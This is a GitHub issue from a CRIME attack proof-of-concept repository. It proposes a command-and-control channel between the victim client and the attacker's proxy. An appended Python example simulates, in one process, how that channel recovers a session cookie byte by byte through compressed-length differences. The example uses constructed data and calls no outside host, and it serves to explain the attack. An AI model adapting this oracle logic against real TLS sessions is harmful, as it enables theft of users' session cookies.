mpgn / CRIME-poc

:hocho: CRIME attack PoC : a compression oracle attack, CVE-2012-4929 :hocho:


Add C&C server (client <-> proxy)

mpgn opened this issue · comments


Add a C&C server on the proxy side to send commands to the client.

The commands allow an attacker to know which byte is being sent and to inform the client when a byte is found.

Unlike the POODLE exploit I already made, here a C&C is mandatory. On the POODLE PoC, to inform the client of something, I sent an HMAC error in the response to the AJAX request by altering the last byte of the encrypted request. Therefore, the client knew something had been discovered on the proxy side and could do something else. (This technique was used to find the length of a block; yes, it's very binary, but it allowed me to simplify the exploit as much as possible.)

How does it work?

  1. On the client side:

    • send the byte to the C&C
    • send the byte to the remote server
  2. On the C&C side:

    • byte received
    • check the length of the request from the proxy
    • send the response to the client (ok, nok)
  3. On the client side:

    • receive the response from the server
    • receive the response from the C&C
    • depending on the response, add another byte or try the next byte

💥🔥💀
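The three-step exchange described in the issue, as an added example that is not code from mpgn/CRIME-poc or from this issue: a self-contained Python simulation in which the victim's request, the proxy's length measurement and the C&C all run in one process. The cookie value `7f3a9c2e`, the hex alphabet, the baseline byte `~`, the message names `baseline` / `guess`, the `Host` header, and the use of fixed Huffman codes in the toy oracle are all assumptions made here, not details of the PoC.

```python
# Added example (not code from mpgn/CRIME-poc): in-process simulation of the
# client <-> C&C <-> proxy exchange from the issue, driving a CRIME-style
# compression oracle. Victim, proxy and C&C are all constructed here.
import zlib
from typing import Optional

KNOWN_PREFIX = b"sessionid="            # the attacker knows the cookie name
SECRET_COOKIE = b"sessionid=7f3a9c2e"   # constructed secret; the value is what gets recovered
ALPHABET = b"0123456789abcdef"          # assumed character set of the secret value
BASELINE_BYTE = b"~"                    # assumed never in the secret: gives the "no match" length


def victim_request(attacker_path: bytes) -> bytes:
    """The victim's browser puts attacker-chosen bytes (the URL) and the secret
    cookie into one request, which is compressed before it is encrypted."""
    return (b"GET /?" + attacker_path + b" HTTP/1.1\r\n"
            b"Cookie: " + SECRET_COOKIE + b"\r\n"
            b"Host: victim.example\r\n\r\n")


def compressed_record_length(plaintext: bytes) -> int:
    """What the proxy can measure: encryption hides the content, not the size.
    Fixed Huffman codes (Z_FIXED) keep this toy oracle deterministic, so every
    wrong guess costs exactly the same number of bits; real TLS compression
    uses dynamic codes, which adds noise the toy does not model."""
    z = zlib.compressobj(9, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(z.compress(plaintext) + z.flush())


class CommandAndControl:
    """Proxy-side C&C: the client announces which byte the next request
    carries, the proxy reports the observed length, the C&C answers ok / nok."""

    def __init__(self) -> None:
        self.baseline: Optional[int] = None  # length when the guess byte cannot match
        self.pending = None
        self.log = []                        # (command, byte, length, answer)

    def command(self, name: str, byte: Optional[bytes] = None) -> None:
        """Client -> C&C: 'baseline' or 'guess', plus the byte being sent."""
        self.pending = (name, byte)

    def observe(self, length: int) -> str:
        """Proxy -> C&C: length of the request that just passed through.
        Returns the C&C -> client answer."""
        name, byte = self.pending
        if name == "baseline":
            self.baseline = length
            answer = "ok"
        else:
            # A correct byte extends the LZ77 match against the cookie by one,
            # so the compressed record shrinks below the baseline.
            answer = "ok" if length < self.baseline else "nok"
        self.log.append((name, byte, length, answer))
        return answer


def client_round(cnc: CommandAndControl, known: bytes, byte: bytes,
                 pad: bytes, name: str) -> str:
    """Client side, one byte: tell the C&C what is being sent, make the victim
    send it to the remote server through the proxy, collect the C&C verdict."""
    cnc.command(name, byte)
    request = victim_request(KNOWN_PREFIX + known + byte + pad)
    return cnc.observe(compressed_record_length(request))  # proxy measures, C&C answers


def recover_secret(secret_len: int = 8) -> bytes:
    """Attacker's client loop: 'ok' -> add another byte, 'nok' -> try the next byte."""
    cnc = CommandAndControl()
    recovered = b""
    pad = b""
    while len(recovered) < secret_len:
        client_round(cnc, recovered, BASELINE_BYTE, pad, "baseline")
        found = None
        for c in ALPHABET:
            if client_round(cnc, recovered, bytes([c]), pad, "guess") == "ok":
                found = bytes([c])
                break
        if found is not None:
            recovered += found
            pad = b""
            continue
        # Every candidate answered nok: the one-byte-longer match saved only a
        # few bits and did not cross a byte boundary. Append a 9-bit literal
        # (a byte >= 0x90 under fixed Huffman) to shift the boundary and retry.
        if len(pad) >= 8:
            raise RuntimeError("no candidate shrank the record at position %d" % len(recovered))
        pad += bytes([0x90 + len(pad)])
    return recovered


if __name__ == "__main__":
    print(recover_secret())
```

The C&C here answers per byte exactly as the issue describes: the client first sends a request whose guess byte cannot match (the baseline), then one request per candidate, and a candidate is "ok" only when the proxy saw a shorter record than the baseline. On "ok" the client appends the byte and moves to the next position; on "nok" it moves to the next candidate. The padding retry covers the case where the extra compression is too small to change the record length in whole bytes, which is the same kind of boundary problem the real attack has to deal with.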